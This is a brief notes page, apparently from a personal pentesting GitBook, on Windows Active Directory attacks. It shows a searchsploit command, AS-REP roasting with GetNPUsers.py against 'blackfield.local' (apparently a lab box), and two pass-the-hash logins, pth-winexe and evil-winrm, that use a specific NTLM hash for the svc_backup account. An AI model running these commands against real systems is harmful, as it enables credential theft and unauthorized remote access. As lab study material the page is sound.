# 04 Windows Enum & Exploit

## ExpolitDB

searchsploit -m 48431

```
searchsploit -m 48431

```

## User Enum

When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command ["pth-winexe](https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/)","[evil-winrm](https://www.hackingarticles.in/evil-winrm-winrm-pentesting-framework/)" will the  NTML hash to log in to the windows system.

```
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
```

```
# Method 1
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd

# Method 2
evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796  -i  10.10.10.192
```

 

{% content-ref url="04-windows-enum-and-exploit" %}
[04-windows-enum-and-exploit](https://calvin-lai.gitbook.io/calvin-lai-security/tools/04-windows-enum-and-exploit)
{% endcontent-ref %}